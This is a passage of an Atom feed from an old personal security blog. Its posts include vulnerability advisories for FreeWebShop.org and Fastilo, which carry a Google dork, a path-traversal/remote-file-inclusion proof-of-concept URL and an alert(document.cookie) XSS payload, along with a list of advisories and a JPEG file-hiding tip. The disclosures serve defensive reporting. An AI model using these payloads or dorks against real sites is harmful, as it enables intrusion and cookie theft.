href='http://14house.blogspot.com/feeds/7222974663964474847/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=7222974663964474847' title='14 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7222974663964474847'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/7222974663964474847'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/05/php-underground-security.html' title='PHP Underground Security'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-4626751992408364432</id><published>2007-05-10T03:01:00.000-07:00</published><updated>2007-05-10T03:13:35.077-07:00</updated><title type='text'>hackits.de</title><content type='html'>Long time I didn´t post any post on my blog, maybe because I don't have too much time or just because I'm kind of a lazy fellow :)&lt;br /&gt;&lt;br /&gt;This post is not to excuse myself about anything, not many people visit this, but to express my opinion on a "new" website I found with great challenges - http://www.hackits.de . There you can find programming challenges, criptography, stenography, programming, javascript, php, vbscrit, java and a lot more, where you can rank yourself up to the top 500 (21000 registered members at the time).&lt;br /&gt;&lt;br /&gt;Also you can get great support in the hackits forum, in irc channel #hackits.de @ irc.quakenet.org or you can PM me in the game (ingame: suntzu).&lt;br /&gt;&lt;br /&gt;PS: I'll try to be more active in this blog, I said TRY ;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-4626751992408364432?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/4626751992408364432/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=4626751992408364432' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4626751992408364432'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4626751992408364432'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/05/hackitsde.html' title='hackits.de'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-4916930923455886189</id><published>2007-01-23T12:35:00.000-08:00</published><updated>2007-01-23T14:10:08.535-08:00</updated><title type='text'>FreeWebShop.org Remote File Inclusion Flaw</title><content type='html'>FreeWebShop.org Remote File Inclusion Flaw&lt;br /&gt;&lt;br /&gt;Software: FreeWebshop.org v2.2.4 &lt;br /&gt;Vendor link: http://www.freewebshop.org // info@freewebshop.org&lt;br /&gt;Attack: Remote File Inclusion&lt;br /&gt;&lt;br /&gt;Discovered by: David Sopas Ferreira a.k.a SmOk3 &lt;mail&gt;smok3f00 at gmail.com&lt;/mail&gt;&lt;br /&gt;&lt;br /&gt;Google dork:"Powered by FreeWebshop.org"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vulnerable Code:&lt;br /&gt;&lt;br /&gt;-- /includes/login.php --&lt;br /&gt;&lt;br /&gt;(...) line 38&lt;br /&gt;include ($lang_file);&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;&lt;br /&gt;/includes/login.php?lang_file=../../../../../../etc/hosts&lt;br /&gt;/includes/login.php?lang_file=[evilscript]&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;http://www.freewebshop.org/?id=36&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-4916930923455886189?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/4916930923455886189/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=4916930923455886189' title='182 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4916930923455886189'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/4916930923455886189'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/01/freewebshoporg-remote-file-inclusion.html' title='FreeWebShop.org Remote File Inclusion Flaw'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>182</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-3661080257729300997</id><published>2007-01-23T03:55:00.000-08:00</published><updated>2007-01-23T04:00:36.126-08:00</updated><title type='text'>All my security advisories</title><content type='html'>Today, I spent some time to gather all my security advisories so far. &lt;br /&gt;&lt;br /&gt;Open Solution Quick.Cart Index.PHP Cross-Site Scripting Vulnerability : 2007-01-12&lt;br /&gt;URL: http://www.securityfocus.com/bid/21971&lt;br /&gt;&lt;br /&gt;Fastilo Index.PHP Cross-Site Scripting Vulnerability : 2007-01-11&lt;br /&gt;URL: http://www.securityfocus.com/bid/22007 &lt;br /&gt;&lt;br /&gt;Mall23 AddItem.ASP SQL Injection Vulnerability : 2005-09-21 &lt;br /&gt;URL: http://www.securityfocus.com/bid/14898&lt;br /&gt;&lt;br /&gt;phpBB 2.0.17 remote avatar size bug : 2005-09-20&lt;br /&gt;URL: http://www.securityfocus.com/archive/1/411229&lt;br /&gt;&lt;br /&gt;MX Shop Index.PHP Multiple SQL Injection Vulnerabilities: 2005-09-19&lt;br /&gt;URL: http://www.securityfocus.com/bid/14876 &lt;br /&gt;&lt;br /&gt;NooToplist Index.PHP Multiple SQL Injection Vulnerabilities : 2005-09-19 &lt;br /&gt;URL: http://www.securityfocus.com/bid/14873 &lt;br /&gt;&lt;br /&gt;Mall23 Infopage.ASP SQL Injection Vulnerability : 2005-09-12&lt;br /&gt;URL: http://www.securityfocus.com/bid/14803&lt;br /&gt;&lt;br /&gt;Emefa Guestbook Multiple HTML Injection Vulnerabilities : 2005-08-18 &lt;br /&gt;URL: http://www.securityfocus.com/bid/14599&lt;br /&gt;&lt;br /&gt;MidiCart ASP Shopping Cart Cross-Site Scripting and SQL Injection : 2005-08-11  &lt;br /&gt;URL: http://secunia.com/advisories/16377/&lt;br /&gt;&lt;br /&gt;Pinnacle Cart Index.PHP Cross-Site Scripting Vulnerability : 2005-04-11 &lt;br /&gt;URL: http://www.securityfocus.com/bid/13138&lt;br /&gt;&lt;br /&gt;VoteBox Votebox.PHP Remote File Include Vulnerability : 2005-03-13 &lt;br /&gt;URL: http://www.securityfocus.com/bid/12806&lt;br /&gt;&lt;br /&gt;SunShop Shopping Cart Cross-Site Scripting Vulnerability : 2005-02-02&lt;br /&gt;URL: http://www.securityfocus.com/bid/12438&lt;br /&gt;&lt;br /&gt;JShop E-Commerce Suite Product.PHP Cross-Site Scripting Vulnerability : 2005-01-30 &lt;br /&gt;URL: http://www.securityfocus.com/bid/12403 &lt;br /&gt;&lt;br /&gt;Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities : 2005-01-26 &lt;br /&gt;URL: http://www.securityfocus.com/bid/12382&lt;br /&gt;&lt;br /&gt;MPM Guestbook Header Input Validation Vulnerability : 2005-01-13&lt;br /&gt;URL: http://www.securityfocus.com/bid/12266&lt;br /&gt;&lt;br /&gt;Guestserver Path Disclosure Vulnerability : 2005-01-10&lt;br /&gt;URL: http://www.securityfocus.com/bid/12230 &lt;br /&gt;&lt;br /&gt;Guestserver HTML Injection Vulnerability : 2005-01-10 &lt;br /&gt;URL: http://www.securityfocus.com/bid/12232 &lt;br /&gt;&lt;br /&gt;PHP-Nuke Search Box Cross-Site Scripting Vulnerabilities  2004-08-11  &lt;br /&gt;URL: http://secunia.com/advisories/12271/&lt;br /&gt;&lt;br /&gt;e107 Website System Multiple Script HTML Injection Vulnerability : 2004-05-05 &lt;br /&gt;URL: http://www.securityfocus.com/bid/10293&lt;br /&gt;&lt;br /&gt;SillySearch "search" Parameter Cross Site Scripting Vulnerability : 2004-03-31&lt;br /&gt;URL: http://secunia.com/advisories/11260/&lt;br /&gt;&lt;br /&gt;IGeneric Free Shopping Cart SQL Injection Vulnerability : 2004-02-29&lt;br /&gt;URL: http://www.securityfocus.com/bid/9771&lt;br /&gt;&lt;br /&gt;IGeneric Free Shopping Cart Cross-Site Scripting Vulnerability : 2004-02-29 &lt;br /&gt;URL: http://www.securityfocus.com/bid/9773 &lt;br /&gt;&lt;br /&gt;Ecommerce Corporation Online Store Kit More.PHP Multiple Vulnerabilities : 2004-02-16&lt;br /&gt;URL: http://www.securityfocus.com/bid/9676&lt;br /&gt;&lt;br /&gt;phpWebSite SQL Injection Vulnerabilities : 2004-02-16  &lt;br /&gt;URL: http://secunia.com/advisories/10878/&lt;br /&gt;&lt;br /&gt;JShop E-Commerce Suite xSearch Cross-Site Scripting Vulnerability : 2004-02-08&lt;br /&gt;URL: http://www.securityfocus.com/bid/9609&lt;br /&gt;&lt;br /&gt;Mambo Open Source Itemid Parameter Cross-Site Scripting Vulnerability : 2004-02-04&lt;br /&gt;URL: http://www.securityfocus.com/bid/9588&lt;br /&gt;&lt;br /&gt;FreznoShop "search.php" Cross-Site Scripting Vulnerability : 2004-01-06  &lt;br /&gt;URL: http://secunia.com/advisories/10547/&lt;br /&gt;&lt;br /&gt;Private Message System Cross-Site Scripting Vulnerability : 2003-12-29  &lt;br /&gt;URL: http://secunia.com/advisories/10501/&lt;br /&gt;&lt;br /&gt;PHPCatalog ID Parameter SQL Injection Vulnerability : 2003-12-28&lt;br /&gt;URL: http://www.securityfocus.com/bid/9318 &lt;br /&gt;&lt;br /&gt;My Little Forum Cross-Site Scripting Vulnerabilities : 2003-12-23 &lt;br /&gt;URL: http://secunia.com/advisories/10489/&lt;br /&gt;&lt;br /&gt;BN Soft BoastMachine Comment Form HTML Injection Vulnerability : 2003-12-21&lt;br /&gt;URL: http://www.securityfocus.com/bid/9270 &lt;br /&gt;&lt;br /&gt;Ben's Guestbook Comments Field Cross-Site Scripting Vulnerability : 2003-12-09  &lt;br /&gt;URL: http://secunia.com/advisories/10394/&lt;br /&gt;&lt;br /&gt;Justin Hagstrom Auto Directory Index Cross-Site Scripting Vulnerability : 2003-11-16&lt;br /&gt;URL: http://www.securityfocus.com/bid/9056&lt;br /&gt;&lt;br /&gt;PowerPortal Search Box Cross-Site Scripting Vulnerability : 2003-11-10  &lt;br /&gt;URL: http://secunia.com/advisories/10172/&lt;br /&gt;&lt;br /&gt;OpenAutoClassifieds Listing Parameter Cross-Site Scripting Vulnerability : 2003-11-03&lt;br /&gt;URL: http://www.securityfocus.com/bid/8972&lt;br /&gt;&lt;br /&gt;MPM Guestbook "lng" Parameter Cross-Site Scripting Vulnerability : 2003-11-03  &lt;br /&gt;URL: http://secunia.com/advisories/10122/&lt;br /&gt;&lt;br /&gt;Total: 36 advisories&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-3661080257729300997?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/3661080257729300997/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=3661080257729300997' title='89 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/3661080257729300997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/3661080257729300997'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/01/all-my-security-advisories.html' title='All my security advisories'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>89</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-5499784115050428637</id><published>2007-01-23T01:21:00.000-08:00</published><updated>2007-01-23T01:22:29.478-08:00</updated><title type='text'>How to hide a file on a jpeg</title><content type='html'>This is kinda of old stuff, but it stills works and its very funny to hide some of&lt;br /&gt;our private files. You only have to compress to a zip file or rar your private &lt;br /&gt;information, then open cmd.exe and type the following:&lt;br /&gt;&lt;br /&gt;copy /b yourpic.jpg + yourcompressfile.rar photograph.jpg&lt;br /&gt;&lt;br /&gt;Open photograph with your image viewer. Yourpic.jpg right? Now, open with winrar. &lt;br /&gt;Your compressed data :D&lt;br /&gt;&lt;br /&gt;I'm writing a basic php tutorial, so in the next days I'll be away from my blog.&lt;br /&gt;&lt;br /&gt;Cya!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-5499784115050428637?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/5499784115050428637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=5499784115050428637' title='78 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5499784115050428637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5499784115050428637'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/01/how-to-hide-file-on-jpeg.html' title='How to hide a file on a jpeg'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>78</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-5266295313680927418</id><published>2007-01-11T10:46:00.000-08:00</published><updated>2007-01-11T10:54:09.971-08:00</updated><title type='text'>Fastilo - Open Source Shopping Cart Vuln</title><content type='html'>Fastilo is a open source shopping cart, based on PHP and SQL and it suffers from a cross site scripting vulnerability in the file index.php.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.fastilo.com"&gt;http://www.fastilo.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This attack can be used by malicious users to grab users cookies or even perform phishing attacks on the system.&lt;br /&gt;&lt;br /&gt;Proof of Concept: .../index.php?p="&gt; &lt; script &gt; alert(document.cookie) &lt; /script &gt;&lt;br /&gt;&lt;br /&gt;A possible solution is to filter out the variable for special chars and tags, this way will prevent most of the attacks.&lt;br /&gt;&lt;br /&gt;by David Sopas aka SmOk3&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-5266295313680927418?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/5266295313680927418/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=5266295313680927418' title='209 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5266295313680927418'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/5266295313680927418'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/01/fastilo-open-source-shopping-cart-vuln.html' title='Fastilo - Open Source Shopping Cart Vuln'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>209</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-2710611164089087797</id><published>2007-01-09T03:02:00.000-08:00</published><updated>2007-01-09T03:06:23.609-08:00</updated><title type='text'>Zone-h got defaced on Christmas</title><content type='html'>Zone-h.org was defaced on Christmas by Cyber-Terrorist, and the problem was due to human error. The forensic is now publish on a zone-h post and seems like a simple hack like grabbing cookie from a hotmail xss bug can get you on defacing the biggest defacer mirror in the world.&lt;br /&gt;&lt;br /&gt;You can see the explanation here:&lt;br /&gt;&lt;a href="http://www.zone-h.org/content/view/14458/31/"&gt;http://www.zone-h.org/content/view/14458/31/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Mirror here:&lt;br /&gt;&lt;a href="http://www.zone-h.org/images/stories/december06/zone-h-defaced.jpg"&gt;http://www.zone-h.org/images/stories/december06/zone-h-defaced.jpg&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-2710611164089087797?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/2710611164089087797/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=2710611164089087797' title='141 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/2710611164089087797'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/2710611164089087797'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2007/01/zone-h-got-defaced-on-christmas.html' title='Zone-h got defaced on Christmas'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>141</thr:total></entry><entry><id>tag:blogger.com,1999:blog-644393906036076309.post-76850283054927825</id><published>2006-12-28T03:33:00.000-08:00</published><updated>2006-12-28T03:38:03.972-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='introduction'/><title type='text'>What's 14 house?</title><content type='html'>Hey, welcome to my personnal blog. Here I'll post my lastest work and news about my simple and monotony life. But, you must me asking yourself (or not), what's 14 house?&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;...&lt;br /&gt;...&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;... my house number :)&lt;br /&gt;&lt;br /&gt;Happy new year to all&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/644393906036076309-76850283054927825?l=14house.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://14house.blogspot.com/feeds/76850283054927825/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=644393906036076309&amp;postID=76850283054927825' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/76850283054927825'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/644393906036076309/posts/default/76850283054927825'/><link rel='alternate' type='text/html' href='http://14house.blogspot.com/2006/12/whats-14-house.html' title='What&apos;s 14 house?'/><author><name>SmOk3</name><uri>http://www.blogger.com/profile/05034789163906615094</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://www.gemspe.com/website/Portals/0/security.jpg'/></author><thr:total>9</thr:total></entry></feed>
